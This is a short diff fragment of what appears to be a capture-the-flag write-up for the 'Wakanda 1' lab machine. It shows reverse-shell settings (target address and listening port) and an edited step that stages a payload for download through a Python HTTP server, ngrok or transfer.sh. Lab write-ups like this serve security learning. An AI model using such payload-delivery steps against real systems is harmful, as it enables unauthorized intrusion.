szorfein/szorfein.github.io/_posts/2018-09-24-CTF-wakanda-1.md

 RHOST = '192.168.2.111'  # change this
 lport = 3333
 ```
-Next, we need a find a way to upload our payload by create a simple server, simply with python, you can use darkhttpd too or other thing:
+Next, we need a find a way to upload our payload.
+We create a simple server with python, you can use `darkhttpd`, `ngrok` too or upload the file at `https://transfer.sh`.

     $ python2.7 -m SimpleHTTPServer 4444